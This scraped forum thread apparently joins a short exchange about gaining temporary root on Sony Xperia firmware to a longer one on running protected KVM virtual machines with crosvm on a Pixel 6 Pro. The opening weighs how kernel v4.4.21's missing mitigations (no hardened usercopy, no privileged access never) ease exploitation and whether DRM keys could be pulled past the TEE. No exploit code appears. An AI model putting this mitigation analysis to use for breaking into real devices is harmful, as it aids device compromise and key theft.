Lowest patch level I could find is April (compared to August of XZ1)... Which a pretty hard target still.
@mirhl: it's strange that temp root is still not available for xz premium, considering it has nougat fw available.
The kernel is v4.4.21 in that fw and it does not have hardened usercopy, does not have privileged access never and also uses only regular stack protector. So it really would be easier, but it would not help devices that have only oreo fw (and only newer kernel with more mitigations integrated).
I feel we may be able to get temp root.
But what about that TA/drm keys backup?
Is here anybody who knows for sure that having temp root is enough?
Would not we be faced then with another security feature like trust zone / trusted execution environment from which it would not be possible to extract the keys?
I mean exploiting linux kernel is one thing, but exploiting TEE would probably be lot harder (if not impossible).
Hey guys. Recently I've got a Pixel 6 Pro device.
I'm trying to run a virtual machine on my phone with additional security features of Android 13 kernel which is called protected KVM(pKVM).
After following the steps of the documentation, I encountered the errors below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
The kernel I'm running on my Pixel 6 Pro device is the latest Android 13 kernel. The command I ran is:
Code:
/apex/com.android.virt/bin/crosvm run --protected-vm -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
Has anyone solved these errors or launched a protected virtual machine successfully?
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
roirraW edor ehT said:
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
Click to expand...
Click to collapse
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
headheadhead said:
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
Click to expand...
Click to collapse
You're welcome. Your response reminded me that there was an XDA article on the subject about VMs on the Pixel 6 as well, although it probably won't help with what you're trying to do.
Android 13 DP1 allows Google Pixel 6 to run full-fledged Windows 11 as a VM
The Android 13 DP1 unlocks the full KVM functionality on the Google Pixel 6 and 6 Pro. You can now boot Windows 11 and Linux VMs on these phones.
www.xda-developers.com
Hi, I too followed the instruction, but could not get it to run. Can someone tell me how they built their kernel?
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
rgarcia1000 said:
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
Click to expand...
Click to collapse
I can run a VM with following command.
Code:
/apex/com.android.virt/bin/crosvm run -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
The kernel I built is the linux mainline kernel. The image I used is ubuntu cloud image.
Thanks, I will give it a try.
Hi, Guy's and Ladies,
I am new to this board. I have been trying to make this work for 3 weeks now.
This is what I tried.
Spoiler
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs /data/local/tmp/ubuntu-20.04-serv>
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ERROR:external/crosvm/src/main.rs:2884] crosvm has exited with error: the architecture failed to build the vm: kernel could not be loaded: Reading image into memory failed: invalid guest memory access at addr=0x80800000: requested memory range spans past the end of the region: offset=8388608 count=568590336 region_size=268435456
I also tried:
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/alpine-rootfs.img /data/local/tmp/Image
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/alpine-rootfs.img
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x411fd440]
[ 0.000000] Linux version 5.16.13-1-aarch64-ARCH ([email protected]) (aarch64-unknown-linux-gnu-gcc (GCC) 11.2.0, GNU ld (GNU Binutils) 2.38) #1 SMP Thu Mar 10 01:59:18 UTC 2022
[ 0.000000] Machine model: linux,dummy-virt
[ 0.000000] efi: UEFI not found.
[ 0.000000] Zone ranges:
[ 0.000000] DMA [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] DMA32 empty
[ 0.000000] Normal empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] cma: Reserved 64 MiB at 0x000000008b800000
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv1.1 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: SMC Calling Convention v1.1
[ 0.000000] smccc: KVM: hypervisor services detected (0x00000000 0x00000000 0x00000000 0x00000003)
[ 0.000000] percpu: Embedded 20 pages/cpu s44568 r8192 d29160 u81920
[ 0.000000] Detected PIPT I-cache on CPU0
[ 0.000000] CPU features: detected: GIC system register CPU interface
[ 0.000000] CPU features: detected: Hardware dirty bit management
[ 0.000000] CPU features: detected: Spectre-v4
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 64512
[ 0.000000] Kernel command line: panic=-1 console=ttyS0 init=/bin/sh root=/dev/vda rw
[ 0.000000] Dentry cache hash table entries: 32768 (order: 6, 262144 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 5, 131072 bytes, linear)
[ 0.000000] mem auto-init: stackff, heap allocff, heap freeff
[ 0.000000] Memory: 150828K/262144K available (19648K kernel code, 3938K rwdata, 9712K rodata, 6336K init, 865K bss, 45780K reserved, 65536K cma-reserved)
[ 0.000000] random: get_random_u64 called from cache_random_seq_create+0x84/0x184 with crng_init=0
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=1.
[ 0.000000] Trampoline variant of Tasks RCU enabled.
[ 0.000000] Rude variant of Tasks RCU enabled.
[ 0.000000] Tracing variant of Tasks RCU enabled.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0
[ 0.000000] GICv3: 32 SPIs implemented
[ 0.000000] GICv3: 0 Extended SPIs implemented
[ 0.000000] GICv3: Distributor has no Range Selector support
[ 0.000000] Root IRQ handler: gic_handle_irq
[ 0.000000] GICv3: 16 PPIs implemented
[ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000003ffd0000
[ 0.000000] arch_timer: cp15 timer(s) running at 24.57MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x5ab00a189, max_idle_ns: 440795202599 ns
[ 0.000000] sched_clock: 56 bits at 24MHz, resolution 40ns, wraps every 4398046511099ns
[ 0.000062] arm-pv: using stolen time PV
[ 0.000271] Console: colour dummy device 80x25
[ 0.000320] Calibrating delay loop (skipped), value calculated using timer frequency.. 49.15 BogoMIPS (lpj=24576)
[ 0.000324] pid_max: default: 32768 minimum: 301
[ 0.000385] LSM: Security Framework initializing
[ 0.000407] Yama: becoming mindful.
[ 0.000490] Mount-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.000500] Mountpoint-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.002706] rcu: Hierarchical SRCU implementation.
[ 0.004135] EFI services will not be available.
[ 0.004315] smp: Bringing up secondary CPUs ...
[ 0.004317] smp: Brought up 1 node, 1 CPU
[ 0.004319] SMP: Total of 1 processors activated.
[ 0.004322] CPU features: detected: 32-bit EL0 Support
[ 0.004323] CPU features: detected: Data cache clean to the PoU not required for I/D coherence
[ 0.004325] CPU features: detected: Common not Private translations
[ 0.004326] CPU features: detected: CRC32 instructions
[ 0.004328] CPU features: detected: RCpc load-acquire (LDAPR)
[ 0.004329] CPU features: detected: LSE atomic instructions
[ 0.004330] CPU features: detected: Privileged Access Never
[ 0.004331] CPU features: detected: RAS Extension Support
[ 0.004339] CPU features: detected: Speculative Store Bypassing Safe (SSBS)
[ 0.040419] CPU: All CPU(s) started at EL1
[ 0.040435] alternatives: patching kernel code
[ 0.041279] devtmpfs: initialized
[ 0.041694] Registered cp15_barrier emulation handler
[ 0.041699] Registered setend emulation handler
[ 0.041765] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[ 0.041769] futex hash table entries: 256 (order: 2, 16384 bytes, linear)
[ 0.041999] pinctrl core: initialized pinctrl subsystem
[ 0.042305] DMI not present or invalid.
[ 0.042538] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.042898] DMA: preallocated 128 KiB GFP_KERNEL pool for atomic allocations
[ 0.043056] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
[ 0.043204] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
[ 0.043214] audit: initializing netlink subsys (disabled)
[ 0.043454] thermal_sys: Registered thermal governor 'fair_share'
[ 0.043455] thermal_sys: Registered thermal governor 'bang_bang'
[ 0.043456] thermal_sys: Registered thermal governor 'step_wise'
[ 0.043457] thermal_sys: Registered thermal governor 'user_space'
[ 0.043457] thermal_sys: Registered thermal governor 'power_allocator'
[ 0.043465] cpuidle: using governor ladder
[ 0.043467] cpuidle: using governor menu
[ 0.043518] hw-breakpoint: found 6 breakpoint and 4 watchpoint registers.
[ 0.043524] ASID allocator initialised with 65536 entries
[ 0.043836] Serial: AMBA PL011 UART driver
[ 0.046243] audit: type=2000 audit(0.042:1): state=initialized audit_enabled=0 res=1
[ 0.046364] HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages
[ 0.046365] HugeTLB registered 32.0 MiB page size, pre-allocated 0 pages
[ 0.046366] HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages
[ 0.046367] HugeTLB registered 64.0 KiB page size, pre-allocated 0 pages
[ 0.046565] cryptd: max_cpu_qlen set to 1000
[ 0.063702] raid6: neonx8 gen() 21845 MB/s
[ 0.080749] raid6: neonx8 xor() 18988 MB/s
[ 0.097796] raid6: neonx4 gen() 22290 MB/s
[ 0.114844] raid6: neonx4 xor() 17047 MB/s
[ 0.131889] raid6: neonx2 gen() 18187 MB/s
[ 0.148933] raid6: neonx2 xor() 16116 MB/s
[ 0.165978] raid6: neonx1 gen() 15432 MB/s
[ 0.183046] raid6: neonx1 xor() 14419 MB/s
[ 0.200402] raid6: int64x8 gen() 9719 MB/s
[ 0.217449] raid6: int64x8 xor() 5117 MB/s
[ 0.234493] raid6: int64x4 gen() 9341 MB/s
[ 0.251540] raid6: int64x4 xor() 5090 MB/s
[ 0.268585] raid6: int64x2 gen() 8131 MB/s
[ 0.285631] raid6: int64x2 xor() 4207 MB/s
[ 0.302676] raid6: int64x1 gen() 6389 MB/s
[ 0.319721] raid6: int64x1 xor() 3552 MB/s
[ 0.319724] raid6: using algorithm neonx4 gen() 22290 MB/s
[ 0.319725] raid6: .... xor() 17047 MB/s, rmw enabled
[ 0.319726] raid6: using neon recovery algorithm
[ 0.319810] ACPI: Interpreter disabled.
[ 0.320010] iommu: Default domain type: Translated
[ 0.320012] iommu: DMA domain TLB invalidation policy: strict mode
[ 0.320055] vgaarb: loaded
[ 0.320277] SCSI subsystem initialized
[ 0.320371] usbcore: registered new interface driver usbfs
[ 0.320383] usbcore: registered new interface driver hub
[ 0.320390] usbcore: registered new device driver usb
[ 0.320436] pps_core: LinuxPPS API ver. 1 registered
[ 0.320437] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[ 0.320439] PTP clock support registered
[ 0.320519] EDAC MC: Ver: 3.0.0
[ 0.320768] Advanced Linux Sound Architecture Driver Initialized.
[ 0.320982] NetLabel: Initializing
[ 0.320983] NetLabel: domain hash size = 128
[ 0.320984] NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO
[ 0.321000] NetLabel: unlabeled traffic allowed by default
[ 0.321090] clocksource: Switched to clocksource arch_sys_counter
[ 0.321255] VFS: Disk quotas dquot_6.6.0
[ 0.321270] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 0.321333] pnp: PnP ACPI: disabled
[ 0.322403] NET: Registered PF_INET protocol family
[ 0.322480] IP idents hash table entries: 4096 (order: 3, 32768 bytes, linear)
[ 0.322840] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.322848] TCP established hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.322873] TCP bind hash table entries: 2048 (order: 3, 32768 bytes, linear)
[ 0.322913] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.323018] MPTCP token hash table entries: 256 (order: 0, 6144 bytes, linear)
[ 0.323033] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323044] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323073] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.323264] RPC: Registered named UNIX socket transport module.
[ 0.323266] RPC: Registered udp transport module.
[ 0.323266] RPC: Registered tcp transport module.
[ 0.323267] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.323268] PCI: CLS 0 bytes, default 64
[ 0.323333] kvm [1]: HYP mode not available
[ 0.323520] Initialise system trusted keyrings
[ 0.323652] workingset: timestamp_bits=46 max_order=16 bucket_order=0
[ 0.324672] zbud: loaded
[ 0.325157] NFS: Registering the id_resolver key type
[ 0.325169] Key type id_resolver registered
[ 0.325170] Key type id_legacy registered
[ 0.325189] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[ 0.325192] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[ 0.325207] ntfs3: Max link count 4000
[ 0.325208] ntfs3: Read-only LZX/Xpress compression included
[ 0.325235] SGI XFS with ACLs, security attributes, quota, no debug enabled
[ 0.334012] NET: Registered PF_ALG protocol family
[ 0.334016] xor: measuring software checksum speed
[ 0.334475] 8regs : 22289 MB/sec
[ 0.334872] 32regs : 26656 MB/sec
[ 0.335122] arm64_neon : 44102 MB/sec
[ 0.335123] xor: using function: arm64_neon (44102 MB/sec)
[ 0.335146] Key type asymmetric registered
[ 0.335147] Asymmetric key parser 'x509' registered
[ 0.335181] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 242)
[ 0.335216] io scheduler mq-deadline registered
[ 0.335217] io scheduler kyber registered
[ 0.335234] io scheduler bfq registered
[ 0.336120] pci-host-generic 10000.pci: host bridge /pci ranges:
[ 0.336133] pci-host-generic 10000.pci: MEM 0x0002000000..0x0003ffffff -> 0x0002000000
[ 0.336136] pci-host-generic 10000.pci: MEM 0x0090800000..0xffffffffff -> 0x0090800000
[ 0.336139] pci-host-generic 10000.pci: Memory resource size exceeds max for 32 bits
[ 0.336141] PCI: OF: PROBE_ONLY enabled
[ 0.336151] pci-host-generic 10000.pci: ECAM at [mem 0x00010000-0x0100ffff] for [bus 00]
[ 0.336173] pci-host-generic 10000.pci: PCI host bridge to bus 0000:00
[ 0.336175] pci_bus 0000:00: root bus resource [mem 0x02000000-0x03ffffff]
[ 0.336176] pci_bus 0000:00: root bus resource [mem 0x90800000-0xffffffffff]
[ 0.336263] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 0.336641] pci 0000:00:01.0: [1af4:1042] type 00 class 0x00ff00
[ 0.336710] pci 0000:00:01.0: reg 0x10: [mem 0x02000000-0x02007fff]
[ 0.337115] pci 0000:00:02.0: [1af4:1044] type 00 class 0x00ff00
[ 0.337160] pci 0000:00:02.0: reg 0x10: [mem 0x02008000-0x0200ffff]
[ 0.337532] pci 0000:00:03.0: [1af4:1045] type 00 class 0x00ff00
[ 0.337590] pci 0000:00:03.0: reg 0x10: [mem 0x02010000-0x02017fff]
[ 0.338005] pci 0000:00:04.0: [1b73:1000] type 00 class 0x0c0330
[ 0.338051] pci 0000:00:04.0: reg 0x10: [mem 0x02020000-0x0202ffff]
[ 0.338280] pci 0000:00:05.0: [1b36:0011] type 00 class 0xffff00
[ 0.338324] pci 0000:00:05.0: reg 0x10: [mem 0x02018000-0x0201800f]
[ 0.338601] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[ 0.338810] IPMI message handler: version 39.2
[ 0.340673] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 0.341038] printk: console [ttyS0] disabled
[ 0.341056] 3f8.U6_16550A: ttyS0 at MMIO 0x3f8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.435958] printk: console [ttyS0] enabled
[ 0.436464] 2f8.U6_16550A: ttyS1 at MMIO 0x2f8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.437278] 3e8.U6_16550A: ttyS2 at MMIO 0x3e8 (irq = 13, base_baud = 115200) is a 16550A
[ 0.438016] 2e8.U6_16550A: ttyS3 at MMIO 0x2e8 (irq = 14, base_baud = 115200) is a 16550A
[ 0.438946] msm_serial: driver initialized
[ 0.439964] cacheinfo: Unable to detect cache hierarchy for CPU 0
[ 0.441149] virtio_blk virtio0: [vda] 5104 512-byte logical blocks (2.61 MB/2.49 MiB)
[ 0.453696] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 0.454270] ehci-pci: EHCI PCI platform driver
[ 0.454594] ehci-platform: EHCI generic platform driver
[ 0.454966] ehci-orion: EHCI orion driver
[ 0.455348] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.455993] ohci-pci: OHCI PCI platform driver
[ 0.456383] ohci-platform: OHCI generic platform driver
[ 0.456811] uhci_hcd: USB Universal Host Controller Interface driver
[ 0.457630] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.458104] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 1
[ 0.459156] xhci_hcd 0000:00:04.0: hcc params 0x30000501 hci version 0x110 quirks 0x0000000000080452
[ 0.460161] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 5.16
[ 0.460851] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.461608] usb usb1: Product: xHCI Host Controller
[ 0.462011] usb usb1: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.462646] usb usb1: SerialNumber: 0000:00:04.0
[ 0.463143] hub 1-0:1.0: USB hub found
[ 0.463495] hub 1-0:1.0: 8 ports detected
[ 0.464194] xhci_hcd 0000:00:04.0: xHCI Host Controller
[ 0.464627] xhci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 2
[ 0.465279] xhci_hcd 0000:00:04.0: Host supports USB 3.0 SuperSpeed
[ 0.465775] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM.
[ 0.466639] usb usb2: New USB device found, idVendor=1d6b, idProduct=0003, bcdDevice= 5.16
[ 0.467436] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 0.468076] usb usb2: Product: xHCI Host Controller
[ 0.468511] usb usb2: Manufacturer: Linux 5.16.13-1-aarch64-ARCH xhci-hcd
[ 0.469285] usb usb2: SerialNumber: 0000:00:04.0
[ 0.469718] hub 2-0:1.0: USB hub found
[ 0.470134] hub 2-0:1.0: 8 ports detected
[ 0.470916] SPI driver max3421-hcd has no spi_device_id for maxim,max3421
[ 0.471647] usbcore: registered new interface driver uas
[ 0.472196] usbcore: registered new interface driver usb-storage
[ 0.472728] usbcore: registered new interface driver ums-alauda
[ 0.473262] usbcore: registered new interface driver ums-cypress
[ 0.473811] usbcore: registered new interface driver ums-datafab
[ 0.474339] usbcore: registered new interface driver ums_eneub6250
[ 0.474857] usbcore: registered new interface driver ums-freecom
[ 0.475381] usbcore: registered new interface driver ums-isd200
[ 0.475872] usbcore: registered new interface driver ums-jumpshot
[ 0.476471] usbcore: registered new interface driver ums-karma
[ 0.476980] usbcore: registered new interface driver ums-onetouch
[ 0.477628] usbcore: registered new interface driver ums-realtek
[ 0.478187] usbcore: registered new interface driver ums-sddr09
[ 0.478692] usbcore: registered new interface driver ums-sddr55
[ 0.479190] usbcore: registered new interface driver ums-usbat
[ 0.479673] usbcore: registered new interface driver usbserial_generic
[ 0.480210] usbserial: USB Serial support registered for generic
[ 0.480937] mousedev: PS/2 mouse device common for all mice
[ 0.482039] device-mapper: uevent: version 1.0.3
[ 0.482585] device-mapper: ioctl: 4.45.0-ioctl (2021-03-22) initialised: [email protected]
[ 0.483635] sdhci: Secure Digital Host Controller Interface driver
[ 0.484165] sdhci: Copyright(c) Pierre Ossman
[ 0.484597] Synopsys Designware Multimedia Card Interface Driver
[ 0.485538] sdhci-pltfm: SDHCI platform and OF driver helper
[ 0.486181] ledtrig-cpu: registered to indicate activity on CPUs
[ 0.486938] hid: raw HID events driver (C) Jiri Kosina
[ 0.487505] usbcore: registered new interface driver usbhid
[ 0.488046] usbhid: USB HID core driver
[ 0.489286] Initializing XFRM netlink socket
[ 0.489884] NET: Registered PF_INET6 protocol family
[ 0.492003] Segment Routing with IPv6
[ 0.492396] In-situ OAM (IOAM) with IPv6
[ 0.492901] mip6: Mobile IPv6
[ 0.493198] NET: Registered PF_PACKET protocol family
[ 0.493793] Key type dns_resolver registered
[ 0.494390] registered taskstats version 1
[ 0.494742] Loading compiled-in X.509 certificates
[ 0.495343] zswap: loaded using pool lzo/zbud
[ 0.495785] debug_vm_pgtable: [debug_vm_pgtable ]: Validating architecture page table helpers
[ 0.496723] Key type ._fscrypt registered
[ 0.497098] Key type .fscrypt registered
[ 0.497514] Key type fscrypt-provisioning registered
[ 0.498375] Btrfs loaded, crc32c=crc32c-generic, zoned=yes, fsverity=no
[ 0.499191] Key type encrypted registered
[ 0.657459] ALSA device list:
[ 0.657786] No soundcards found.
[ 0.658355] md: Waiting for all devices to be available before autodetect
[ 0.658953] md: If you don't use raid, use raid=noautodetect
[ 0.659460] md: Autodetecting RAID arrays.
[ 0.659861] md: autorun ...
[ 0.660147] md: ... autorun DONE.
[ 0.664078] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.664970] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.666059] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.666714] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.670343] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.671002] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.672025] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.672732] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.673553] List of all partitions:
[ 0.673850] fd00 2552 vda
[ 0.673853] driver: virtio_blk
[ 0.674375] No filesystem could mount root, tried:
[ 0.674377] ext3
[ 0.674706] ext2
[ 0.674854] ext4
[ 0.674988] vfat
[ 0.675161] msdos
[ 0.675411] ntfs3
[ 0.675683] xfs
[ 0.675867] f2fs
[ 0.676014] btrfs
[ 0.676172]
[ 0.676436] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,0)
[ 0.677087] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.16.13-1-aarch64-ARCH #1
[ 0.677776] Hardware name: linux,dummy-virt (DT)
[ 0.678237] Call trace:
[ 0.678497] dump_backtrace+0x0/0x1cc
[ 0.678848] show_stack+0x18/0x24
[ 0.679114] dump_stack_lvl+0x68/0x84
[ 0.679447] dump_stack+0x18/0x34
[ 0.679729] panic+0x138/0x308
[ 0.679991] mount_block_root+0x1e0/0x1fc
[ 0.680365] mount_root+0x150/0x170
[ 0.680707] prepare_namespace+0x134/0x174
[ 0.681151] kernel_init_freeable+0x20c/0x244
[ 0.681573] kernel_init+0x28/0x140
[ 0.681889] ret_from_fork+0x10/0x20
[ 0.682201] Kernel Offset: disabled
[ 0.682483] CPU features: 0x00,00000302,46600e42
[ 0.682904] Memory Limit: none
[INFO:external/crosvm/src/linux/vcpu.rs:470] system reset event
[INFO:external/crosvm/src/linux/mod.rs:1830] vcpu requested reset
[ERROR:external/crosvm/src/linux/vcpu.rs:739] failed to send VcpuControl: sending on a closed channel
[INFO:external/crosvm/src/main.rs:2872] crosvm has exited normally due to reset request.
Can someone show me how they got it to run?
Thanks Ron
Hi Ron / @cron5918. Welcome to XDA. Please in the future use either [quote]stuff[/quote] or [spoiler="Name of stuff"]stuff[/spoiler] for super-long segments of logs or code.
You can Edit your post and insert those items any time if you wouldn't mind. Disregard.
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
I tried Ron's way also, no luck
rgarcia1000 said:
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
Click to expand...
Click to collapse
The image I used is this.
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
How are you guys getting / building your kernels? Been trying to get this to work too.
cron5918 said:
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
Click to expand...
Click to collapse
Sorry for the mistake. I ran arm64 on pixel. lt is now corrected.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Click to expand...
Click to collapse
Use the Linux mainline kernel. You can find several tutorials about building the Linux mainline kernel.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Click to expand...
Click to collapse
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Been asking for this also, I don't know if I am building the Kernel right.
Head if it is not too much trouble can you show use what you did to build the kernel?
rgarcia1000 said:
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Click to expand...
Click to collapse
Thanks for the pointer! I've built kernels in the past but forgive me for such a stupid question. You're building this on your pc not your phone right? I keep getting this error on Arch.
Code:
Makefile:625: arch/aarm64/Makefile: No such file or directory
However I can build doing "make ARCH=arm64".